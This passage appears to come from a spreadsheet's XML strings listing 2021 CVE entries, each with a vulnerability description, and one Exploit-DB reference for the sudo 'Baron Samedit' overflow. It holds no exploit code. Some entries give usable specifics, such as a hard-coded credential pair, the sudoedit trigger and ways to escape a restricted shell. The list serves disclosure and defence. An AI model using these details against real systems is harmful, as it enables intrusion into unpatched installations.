    <t>This vulnerability allows remote attackers to disclose sensitive information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user-supplied data, which can result in a read past the end of an allocated data structure. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-12744.</t>
  </si>
  <si>
    <t>CVE-2021-31499</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user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12745.</t>
  </si>
  <si>
    <t>CVE-2021-3150</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability on the Delete Personal Data page in Cryptshare Server before 4.8.0 allows an attacker to inject arbitrary web script or HTML via the user name. The issue is fixed with the version 4.8.1</t>
  </si>
  <si>
    <t>CVE-2021-31500</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WF files. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12746.</t>
  </si>
  <si>
    <t>CVE-2021-31501</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWG files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated data structure. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-13310.</t>
  </si>
  <si>
    <t>CVE-2021-31502</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop Build 16.6.4.55. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13673.</t>
  </si>
  <si>
    <t>CVE-2021-31503</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop Build 16.6.3.84 (package 16.6.3.134). User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of IGS files. The issue results from the lack of proper initialization of a pointer prior to accessing it. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12690.</t>
  </si>
  <si>
    <t>CVE-2021-31504</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop Build 16.6.3.84 (package 16.6.3.134). User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12691.</t>
  </si>
  <si>
    <t>CVE-2021-31505</t>
  </si>
  <si>
    <t>This vulnerability allows attackers with physical access to escalate privileges on affected installations of Arlo Q Plus 1.9.0.3_278. Authentication is not required to exploit this vulnerability. The specific flaw exists within the SSH service. The device can be booted into a special operation mode where hard-coded credentials are accepted for SSH authentication. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root. Was ZDI-CAN-12890.</t>
  </si>
  <si>
    <t>CVE-2021-31506</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to disclose sensitive information on affected installations of OpenText Brava! Desktop Build 16.6.4.55. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated data structure. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-13674.</t>
  </si>
  <si>
    <t>CVE-2021-31507</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CGM files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12653.</t>
  </si>
  <si>
    <t>CVE-2021-31508</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XF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13306.</t>
  </si>
  <si>
    <t>CVE-2021-31509</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop 16.6.3.84. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13309.</t>
  </si>
  <si>
    <t>CVE-2021-3151</t>
  </si>
  <si>
    <t>i-doit before 1.16.0 is affected by Stored Cross-Site Scripting (XSS) issues that could allow remote authenticated attackers to inject arbitrary web script or HTML via C__MONITORING__CONFIG__TITLE, SM2__C__MONITORING__CONFIG__TITLE, C__MONITORING__CONFIG__PATH, SM2__C__MONITORING__CONFIG__PATH, C__MONITORING__CONFIG__ADDRESS, or SM2__C__MONITORING__CONFIG__ADDRESS.</t>
  </si>
  <si>
    <t>CVE-2021-31510</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop Build 16.6.4.55. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of TIF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13675.</t>
  </si>
  <si>
    <t>CVE-2021-31511</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop Build 16.6.4.55. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13676.</t>
  </si>
  <si>
    <t>CVE-2021-31512</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop Build 16.6.4.55. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of TIF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13677.</t>
  </si>
  <si>
    <t>CVE-2021-31513</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop Build 16.6.4.55. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of BMP files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13678.</t>
  </si>
  <si>
    <t>CVE-2021-31514</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of OpenText Brava! Desktop Build 16.6.4.55. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CGM files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13679.</t>
  </si>
  <si>
    <t>CVE-2021-31515</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Vector 35 Binary Ninja 2.3.2660 (Build ID 88f343c3). User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of BNDB files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated data structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13668.</t>
  </si>
  <si>
    <t>CVE-2021-31516</t>
  </si>
  <si>
    <t>This vulnerability allows remote attackers to execute arbitrary code on affected installations of Vector 35 Binary Ninja 2.3.2660 (Build ID 88f343c3). User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of BNDB files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-13670.</t>
  </si>
  <si>
    <t>CVE-2021-31517</t>
  </si>
  <si>
    <t>Trend Micro Home Network Security 6.5.599 and earlier is vulnerable to a file-parsing vulnerability which could allow an attacker to exploit the vulnerability and cause a denial-of-service to the device. This vulnerability is similar, but not identical to CVE-2021-31518.</t>
  </si>
  <si>
    <t>CVE-2021-31518</t>
  </si>
  <si>
    <t>Trend Micro Home Network Security 6.5.599 and earlier is vulnerable to a file-parsing vulnerability which could allow an attacker to exploit the vulnerability and cause a denial-of-service to the device. This vulnerability is similar, but not identical to CVE-2021-31517.</t>
  </si>
  <si>
    <t>CVE-2021-31519</t>
  </si>
  <si>
    <t>An incorrect permission vulnerability in the product installer folders for Trend Micro HouseCall for Home Networks version 5.3.1179 and below could allow an attacker to escalate privileges by placing arbitrary code on a specified folder and have that code be executed by an Administrator who is running a scan. Please note that an attacker must first obtain the ability to execute low-privileged code on the target system to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-3152</t>
  </si>
  <si>
    <t>** DISPUTED ** Home Assistant before 2021.1.3 does not have a protection layer that can help to prevent directory-traversal attacks against custom integrations. NOTE: the vendor's perspective is that the vulnerability itself is in custom integrations written by third parties, not in Home Assistant; however, Home Assistant does have a security update that is worthwhile in addressing this situation.</t>
  </si>
  <si>
    <t>CVE-2021-31520</t>
  </si>
  <si>
    <t>A weak session token authentication bypass vulnerability in Trend Micro IM Security 1.6 and 1.6.5 could allow an remote attacker to guess currently logged-in administrators' session session token in order to gain access to the product's web management interface.</t>
  </si>
  <si>
    <t>CVE-2021-31521</t>
  </si>
  <si>
    <t>Trend Micro InterScan Web Security Virtual Appliance version 6.5 was found to have a reflected cross-site scripting (XSS) vulnerability in the product's Captive Portal.</t>
  </si>
  <si>
    <t>CVE-2021-31522</t>
  </si>
  <si>
    <t>Kylin can receive user input and load any class through Class.forName(...). This issue affects Apache Kylin 2 version 2.6.6 and prior versions; Apache Kylin 3 version 3.1.2 and prior versions; Apache Kylin 4 version 4.0.0 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-31523</t>
  </si>
  <si>
    <t>The Debian xscreensaver 5.42+dfsg1-1 package for XScreenSaver has cap_net_raw enabled for the /usr/libexec/xscreensaver/sonar file, which allows local users to gain privileges because this is arguably incompatible with the design of the Mesa 3D Graphics library dependency.</t>
  </si>
  <si>
    <t>CVE-2021-31525</t>
  </si>
  <si>
    <t>net/http in Go before 1.15.12 and 1.16.x before 1.16.4 allows remote attackers to cause a denial of service (panic) via a large header to ReadRequest or ReadResponse. Server, Transport, and Client can each be affected in some configurations.</t>
  </si>
  <si>
    <t>CVE-2021-3153</t>
  </si>
  <si>
    <t>HashiCorp Terraform Enterprise up to v202102-2 failed to enforce an organization-level setting that required users within an organization to have two-factor authentication enabled. Fixed in v202103-1.</t>
  </si>
  <si>
    <t>CVE-2021-31530</t>
  </si>
  <si>
    <t>Zoho ManageEngine ServiceDesk Plus MSP before 10522 is vulnerable to Information Disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-31531</t>
  </si>
  <si>
    <t>Zoho ManageEngine ServiceDesk Plus MSP before 10521 is vulnerable to Server-Side Request Forgery (SSRF).</t>
  </si>
  <si>
    <t>CVE-2021-31532</t>
  </si>
  <si>
    <t>NXP LPC55S6x microcontrollers (0A and 1B), i.MX RT500 (silicon rev B1 and B2), i.MX RT600 (silicon rev A0, B0), LPC55S6x, LPC55S2x, LPC552x (silicon rev 0A, 1B), LPC55S1x, LPC551x (silicon rev 0A) and LPC55S0x, LPC550x (silicon rev 0A) include an undocumented ROM patch peripheral that allows unsigned, non-persistent modification of the internal ROM.</t>
  </si>
  <si>
    <t>CVE-2021-31535</t>
  </si>
  <si>
    <t>LookupCol.c in X.Org X through X11R7.7 and libX11 before 1.7.1 might allow remote attackers to execute arbitrary code. The libX11 XLookupColor request (intended for server-side color lookup) contains a flaw allowing a client to send color-name requests with a name longer than the maximum size allowed by the protocol (and also longer than the maximum packet size for normal-sized packets). The user-controlled data exceeding the maximum size is then interpreted by the server as additional X protocol requests and executed, e.g., to disable X server authorization completely. For example, if the victim encounters malicious terminal control sequences for color codes, then the attacker may be able to take full control of the running graphical session.</t>
  </si>
  <si>
    <t>CVE-2021-31537</t>
  </si>
  <si>
    <t>SIS SIS-REWE Go before 7.7 SP17 allows XSS: rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters).</t>
  </si>
  <si>
    <t>CVE-2021-31538</t>
  </si>
  <si>
    <t>LANCOM R&amp;S Unified Firewall (UF) devices running LCOS FX 10.5 allow Relative Path Traversal.</t>
  </si>
  <si>
    <t>CVE-2021-31539</t>
  </si>
  <si>
    <t>Wowza Streaming Engine before 4.8.8.01 (in a default installation) has cleartext passwords stored in the conf/admin.password file. A regular local user is able to read usernames and passwords.</t>
  </si>
  <si>
    <t>CVE-2021-3154</t>
  </si>
  <si>
    <t>An issue was discovered in SolarWinds Serv-U before 15.2.2. Unauthenticated attackers can retrieve cleartext passwords via macro Injection. NOTE: this had a distinct fix relative to CVE-2020-35481.</t>
  </si>
  <si>
    <t>CVE-2021-31540</t>
  </si>
  <si>
    <t>Wowza Streaming Engine through 4.8.5 (in a default installation) has incorrect file permissions of configuration files in the conf/ directory. A regular local user is able to read and write to all the configuration files, e.g., modify the application server configuration.</t>
  </si>
  <si>
    <t>CVE-2021-31542</t>
  </si>
  <si>
    <t>In Django 2.2 before 2.2.21, 3.1 before 3.1.9, and 3.2 before 3.2.1, MultiPartParser, UploadedFile, and FieldFile allowed directory traversal via uploaded files with suitably crafted file names.</t>
  </si>
  <si>
    <t>CVE-2021-31545</t>
  </si>
  <si>
    <t>An issue was discovered in the AbuseFilter extension for MediaWiki through 1.35.2. The page_recent_contributors leaked the existence of certain deleted MediaWiki usernames, related to rev_deleted.</t>
  </si>
  <si>
    <t>CVE-2021-31546</t>
  </si>
  <si>
    <t>An issue was discovered in the AbuseFilter extension for MediaWiki through 1.35.2. It incorrectly logged sensitive suppression deletions, which should not have been visible to users with access to view AbuseFilter log data.</t>
  </si>
  <si>
    <t>CVE-2021-31547</t>
  </si>
  <si>
    <t>An issue was discovered in the AbuseFilter extension for MediaWiki through 1.35.2. Its AbuseFilterCheckMatch API reveals suppressed edits and usernames to unprivileged users through the iteration of crafted AbuseFilter rules.</t>
  </si>
  <si>
    <t>CVE-2021-31548</t>
  </si>
  <si>
    <t>An issue was discovered in the AbuseFilter extension for MediaWiki through 1.35.2. A MediaWiki user who is partially blocked or was unsuccessfully blocked could bypass AbuseFilter and have their edits completed.</t>
  </si>
  <si>
    <t>CVE-2021-31549</t>
  </si>
  <si>
    <t>An issue was discovered in the AbuseFilter extension for MediaWiki through 1.35.2. The Special:AbuseFilter/examine form allowed for the disclosure of suppressed MediaWiki usernames to unprivileged users.</t>
  </si>
  <si>
    <t>CVE-2021-3155</t>
  </si>
  <si>
    <t>snapd 2.54.2 and earlier created ~/snap directories in user home directories without specifying owner-only permissions. This could allow a local attacker to read information that should have been private. Fixed in snapd versions 2.54.3+18.04, 2.54.3+20.04 and 2.54.3+21.10.1</t>
  </si>
  <si>
    <t>CVE-2021-31550</t>
  </si>
  <si>
    <t>An issue was discovered in the CommentBox extension for MediaWiki through 1.35.2. Via crafted configuration variables, a malicious actor could introduce XSS payloads into various layers.</t>
  </si>
  <si>
    <t>CVE-2021-31551</t>
  </si>
  <si>
    <t>An issue was discovered in the PageForms extension for MediaWiki through 1.35.2. Crafted payloads for Token-related query parameters allowed for XSS on certain PageForms-managed MediaWiki pages.</t>
  </si>
  <si>
    <t>CVE-2021-31552</t>
  </si>
  <si>
    <t>An issue was discovered in the AbuseFilter extension for MediaWiki through 1.35.2. It incorrectly executed certain rules related to blocking accounts after account creation. Such rules would allow for user accounts to be created while blocking only the IP address used to create an account (and not the user account itself). Such rules could also be used by a nefarious, unprivileged user to catalog and enumerate any number of IP addresses related to these account creations.</t>
  </si>
  <si>
    <t>CVE-2021-31553</t>
  </si>
  <si>
    <t>An issue was discovered in the CheckUser extension for MediaWiki through 1.35.2. MediaWiki usernames with trailing whitespace could be stored in the cu_log database table such that denial of service occurred for certain CheckUser extension pages and functionality. For example, the attacker could turn off Special:CheckUserLog and thus interfere with usage tracking.</t>
  </si>
  <si>
    <t>CVE-2021-31554</t>
  </si>
  <si>
    <t>An issue was discovered in the AbuseFilter extension for MediaWiki through 1.35.2. It improperly handled account blocks for certain automatically created MediaWiki user accounts, thus allowing nefarious users to remain unblocked.</t>
  </si>
  <si>
    <t>CVE-2021-31555</t>
  </si>
  <si>
    <t>An issue was discovered in the Oauth extension for MediaWiki through 1.35.2. It did not validate the oarc_version (aka oauth_registered_consumer.oarc_version) parameter's length.</t>
  </si>
  <si>
    <t>CVE-2021-31556</t>
  </si>
  <si>
    <t>An issue was discovered in the Oauth extension for MediaWiki through 1.35.2. MWOAuthConsumerSubmitControl.php does not ensure that the length of an RSA key will fit in a MySQL blob.</t>
  </si>
  <si>
    <t>CVE-2021-31558</t>
  </si>
  <si>
    <t>DIAEnergie Version 1.7.5 and prior is vulnerable to stored cross-site scripting when an unauthenticated user injects arbitrary code into the parameter “descr” of the script “DIAE_hierarchyHandler.ashx”.</t>
  </si>
  <si>
    <t>CVE-2021-31559</t>
  </si>
  <si>
    <t>A crafted request bypasses S2S TCP Token authentication writing arbitrary events to an index in Splunk Enterprise Indexer 8.1 versions before 8.1.5 and 8.2 versions before 8.2.1. The vulnerability impacts Indexers configured to use TCPTokens. It does not impact Universal Forwarders.</t>
  </si>
  <si>
    <t>CVE-2021-3156</t>
  </si>
  <si>
    <t>Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character.</t>
  </si>
  <si>
    <t>exploits/multiple/local/49522.c</t>
  </si>
  <si>
    <t>Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (2)</t>
  </si>
  <si>
    <t>2021-02-03</t>
  </si>
  <si>
    <t>CVE-2021-31562</t>
  </si>
  <si>
    <t>The SSL/TLS configuration of Fresenius Kabi Agilia Link + version 3.0 has serious deficiencies that may allow an attacker to compromise SSL/TLS sessions in different ways. An attacker may be able to eavesdrop on transferred data, manipulate data allegedly secured by SSL/TLS, and impersonate an entity to gain access to sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-31566</t>
  </si>
  <si>
    <t>An improper link resolution flaw can occur while extracting an archive leading to changing modes, times, access control lists, and flags of a file outside of the archive. An attacker may provide a malicious archive to a victim user, who would trigger this flaw when trying to extract the archive. A local attacker may use this flaw to gain more privileges in a system.</t>
  </si>
  <si>
    <t>CVE-2021-31567</t>
  </si>
  <si>
    <t>Authenticated (admin+) Arbitrary File Download vulnerability discovered in Download Monitor WordPress plugin (versions &lt;= 4.4.6). The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the &amp;downloadable_file_urls[0] parameter data. It's also possible to escape from the web server home directory and download any file within the OS.</t>
  </si>
  <si>
    <t>CVE-2021-31571</t>
  </si>
  <si>
    <t>The kernel in Amazon Web Services FreeRTOS before 10.4.3 has an integer overflow in queue.c for queue creation.</t>
  </si>
  <si>
    <t>CVE-2021-31572</t>
  </si>
  <si>
    <t>The kernel in Amazon Web Services FreeRTOS before 10.4.3 has an integer overflow in stream_buffer.c for a stream buffer.</t>
  </si>
  <si>
    <t>CVE-2021-31579</t>
  </si>
  <si>
    <t>Akkadian Provisioning Manager Engine (PME) ships with a hard-coded credential, akkadianuser:haakkadianpassword. This issue was resolved in Akkadian OVA appliance version 3.0 (and later), Akkadian Provisioning Manager 5.0.2 (and later), and Akkadian Appliance Manager 3.3.0.314-4a349e0 (and later).</t>
  </si>
  <si>
    <t>CVE-2021-31580</t>
  </si>
  <si>
    <t>The restricted shell provided by Akkadian Provisioning Manager Engine (PME) can be bypassed by switching the OpenSSH channel from `shell` to `exec` and providing the ssh client a single execution parameter. This issue was resolved in Akkadian OVA appliance version 3.0 (and later), Akkadian Provisioning Manager 5.0.2 (and later), and Akkadian Appliance Manager 3.3.0.314-4a349e0 (and later).</t>
  </si>
  <si>
    <t>CVE-2021-31581</t>
  </si>
  <si>
    <t>The restricted shell provided by Akkadian Provisioning Manager Engine (PME) can be escaped by abusing the 'Edit MySQL Configuration' command. This command launches a standard vi editor interface which can then be escaped. This issue was resolved in Akkadian OVA appliance version 3.0 (and later), Akkadian Provisioning Manager 5.0.2 (and later), and Akkadian Appliance Manager 3.3.0.314-4a349e0 (and later).</t>
  </si>
  <si>
    <t>CVE-2021-31583</t>
  </si>
  <si>
    <t>Sipwise C5 NGCP WWW Admin version 3.6.7 up to and including platform version NGCP CE 3.0 has multiple authenticated stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user: Stored XSS in callforward/time/set/save (POST tsetname); Reflected XSS in addressbook (GET filter); Stored XSS in addressbook/save (POST firstname, lastname, company); and Reflected XSS in statistics/versions (GET lang).</t>
  </si>
  <si>
    <t>CVE-2021-31584</t>
  </si>
  <si>
    <t>Sipwise C5 NGCP www_csc version 3.6.4 up to and including platform NGCP CE mr3.8.13 allows call/click2dial CSRF attacks for actions with administrative privileges.</t>
  </si>
  <si>
    <t>CVE-2021-31585</t>
  </si>
  <si>
    <t>Accellion Kiteworks before 7.3.1 allows a user with Admin privileges to escalate their privileges by generating SSH passwords that allow local access.</t>
  </si>
  <si>
    <t>CVE-2021-31586</t>
  </si>
  <si>
    <t>Accellion Kiteworks before 7.4.0 allows an authenticated user to perform SQL Injection via LDAPGroup Search.</t>
  </si>
  <si>
    <t>CVE-2021-31589</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability has been reported and confirmed for BeyondTrust Secure Remote Access Base Software version 6.0.1 and older, which allows the injection of unauthenticated, specially-crafted web requests without proper sanitization.</t>
  </si>
  <si>
    <t>CVE-2021-3159</t>
  </si>
  <si>
    <t>A stored cross site scripting (XSS) vulnerability in the /sys/attachment/uploaderServlet component of Landray EKP V12.0.9.R.20160325 allows attackers to execute arbitrary web scripts or HTML via a crafted SVG, SHTML, or MHT file.</t>
  </si>
  <si>
    <t>CVE-2021-31590</t>
  </si>
  <si>
    <t>PwnDoc all versions until 0.4.0 (2021-08-23) has incorrect JSON Webtoken handling, leading to incorrect access control. With a valid JSON Webtoken that is used for authentication and authorization, a user can keep his admin privileges even if he is downgraded to the "user" privilege. Even after a user's account is deleted, the user can still access the administration panel (and add or delete users) and has complete access to the system.</t>
  </si>
  <si>
    <t>CVE-2021-31597</t>
  </si>
  <si>
    <t>The xmlhttprequest-ssl package before 1.6.1 for Node.js disables SSL certificate validation by default, because rejectUnauthorized (when the property exists but is undefined) is considered to be false within the https.request function of Node.js. In other words, no certificate is ever rejected.</t>
  </si>
  <si>
    <t>CVE-2021-31598</t>
  </si>
  <si>
    <t>An issue was discovered in libezxml.a in ezXML 0.8.6. The function ezxml_decode() performs incorrect memory handling while parsing crafted XML files, leading to a heap-based buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-31599</t>
  </si>
  <si>
    <t>An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. A reports (.prpt) file allows the inclusion of BeanShell scripts to ease the production of complex reports. An authenticated user can run arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-3160</t>
  </si>
  <si>
    <t>Deserialization of untrusted data in the login page of ASSUWEB 359.3 build 1 subcomponent of ACA ASSUREX RENTES product allows a remote attacker to inject unsecure serialized Java object using a specially crafted HTTP request, resulting in an unauthenticated remote code execution on the server.</t>
  </si>
  <si>
    <t>CVE-2021-31600</t>
  </si>
  <si>
    <t>An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. They implement a series of web services using the SOAP protocol to allow scripting interaction with the backend server. An authenticated user (regardless of privileges) can list all valid usernames.</t>
  </si>
  <si>
    <t>CVE-2021-31601</t>
  </si>
  <si>
    <t>An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. They implement a series of web services using the SOAP protocol to allow scripting interaction with the backend server. An authenticated user (regardless of privileges) can list all databases connection details and credentials.</t>
  </si>
  <si>
    <t>CVE-2021-31602</t>
  </si>
  <si>
    <t>An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.</t>
  </si>
  <si>
    <t>CVE-2021-31604</t>
  </si>
  <si>
    <t>furlongm openvpn-monitor through 1.1.3 allows CSRF to disconnect an arbitrary client.</t>
  </si>
  <si>
    <t>CVE-2021-31605</t>
  </si>
  <si>
    <t>furlongm openvpn-monitor through 1.1.3 allows %0a command injection via the OpenVPN management interface socket. This can shut down the server via signal%20SIGTERM.</t>
  </si>
  <si>
    <t>CVE-2021-31606</t>
  </si>
  <si>
    <t>furlongm openvpn-monitor through 1.1.3 allows Authorization Bypass to disconnect arbitrary clients.</t>
  </si>
  <si>
    <t>CVE-2021-31607</t>
  </si>
  <si>
    <t>In SaltStack Salt 2016.9 through 3002.6, a command injection vulnerability exists in the snapper module that allows for local privilege escalation on a minion. The attack requires that a file is created with a pathname that is backed up by snapper, and that the master calls the snapper.diff function (which executes popen unsafely).</t>
  </si>
  <si>
    <t>CVE-2021-31608</t>
  </si>
  <si>
    <t>Proofpoint Enterprise Protection before 18.8.0 allows a Bypass of a Security Control.</t>
  </si>
  <si>
    <t>CVE-2021-31609</t>
  </si>
  <si>
    <t>The Bluetooth Classic implementation in Silicon Labs iWRAP 6.3.0 and earlier does not properly handle the reception of an oversized LMP packet greater than 17 bytes, allowing attackers in radio range to trigger a crash in WT32i via a crafted LMP packet.</t>
  </si>
  <si>
    <t>CVE-2021-31610</t>
  </si>
  <si>
    <t>The Bluetooth Classic implementation on AB32VG1 devices does not properly handle the reception of continuous unsolicited LMP responses, allowing attackers in radio range to trigger a denial of service (either restart or deadlock the device) by flooding a device with LMP_AU_rand data.</t>
  </si>
  <si>
    <t>CVE-2021-31611</t>
  </si>
  <si>
    <t>The Bluetooth Classic implementation on Zhuhai Jieli AC690X and AC692X devices does not properly handle an out-of-order LMP Setup procedure that is followed by a malformed LMP packet, allowing attackers in radio range to deadlock a device via a crafted LMP packet. The user needs to manually reboot the device to restore communication.</t>
  </si>
  <si>
    <t>CVE-2021-31612</t>
  </si>
  <si>
    <t>The Bluetooth Classic implementation on Zhuhai Jieli AC690X devices does not properly handle the reception of an oversized LMP packet greater than 17 bytes during the LMP auto rate procedure, allowing attackers in radio range to trigger a deadlock via a crafted LMP packet.</t>
  </si>
  <si>
    <t>CVE-2021-31613</t>
  </si>
  <si>
    <t>The Bluetooth Classic implementation on Zhuhai Jieli AC690X and AC692X devices does not properly handle the reception of a truncated LMP packet during the LMP auto rate procedure, allowing attackers in radio range to immediately crash (and restart) a device via a crafted LMP packet.</t>
  </si>
  <si>
    <t>CVE-2021-31615</t>
  </si>
  <si>
    <t>Unencrypted Bluetooth Low Energy baseband links in Bluetooth Core Specifications 4.0 through 5.2 may permit an adjacent device to inject a crafted packet during the receive window of the listening device before the transmitting device initiates its packet transmission to achieve full MITM status without terminating the link. When applied against devices establishing or using encrypted links, crafted packets may be used to terminate an existing link, but will not compromise the confidentiality or integrity of the link.</t>
  </si>
  <si>
    <t>CVE-2021-31616</t>
  </si>
  <si>
    <t>Insufficient length checks in the ShapeShift KeepKey hardware wallet firmware before 7.1.0 allow a stack buffer overflow via crafted messages. The overflow in ethereum_extractThorchainSwapData() in ethereum.c can circumvent stack protections and lead to code execution. The vulnerable interface is reachable remotely over WebUSB.</t>
  </si>
  <si>
    <t>CVE-2021-31617</t>
  </si>
  <si>
    <t>In ASQ in Stormshield Network Security (SNS) 1.0.0 through 2.7.8, 2.8.0 through 2.16.0, 3.0.0 through 3.7.20, 3.8.0 through 3.11.8, and 4.0.1 through 4.2.2, mishandling of memory management can lead to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-31618</t>
  </si>
  <si>
    <t>Apache HTTP Server protocol handler for the HTTP/2 protocol checks received request headers against the size limitations as configured for the server and used for the HTTP/1 protocol as well. On violation of these restrictions and HTTP response is sent to the client with a status code indicating why the request was rejected. This rejection response was not fully initialised in the HTTP/2 protocol handler if the offending header was the very first one received or appeared in a a footer. This led to a NULL pointer dereference on initialised memory, crashing reliably the child process. Since such a triggering HTTP/2 request is easy to craft and submit, this can be exploited to DoS the server. This issue affected mod_http2 1.15.17 and Apache HTTP Server version 2.4.47 only. Apache HTTP Server 2.4.47 was never released.</t>
  </si>
  <si>
    <t>CVE-2021-3162</t>
  </si>
  <si>
    <t>Docker Desktop Community before 2.5.0.0 on macOS mishandles certificate checking, leading to local privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2021-31624</t>
  </si>
  <si>
    <t>Buffer Overflow vulnerability in Tenda AC9 V1.0 through V15.03.05.19(6318), and AC9 V3.0 V15.03.06.42_multi, allows attackers to execute arbitrary code via the urls parameter.</t>
  </si>
  <si>
    <t>CVE-2021-31627</t>
  </si>
  <si>
    <t>Buffer Overflow vulnerability in Tenda AC9 V1.0 through V15.03.05.19(6318), and AC9 V3.0 V15.03.06.42_multi, allows attackers to execute arbitrary code via the index parameter.</t>
  </si>
  <si>
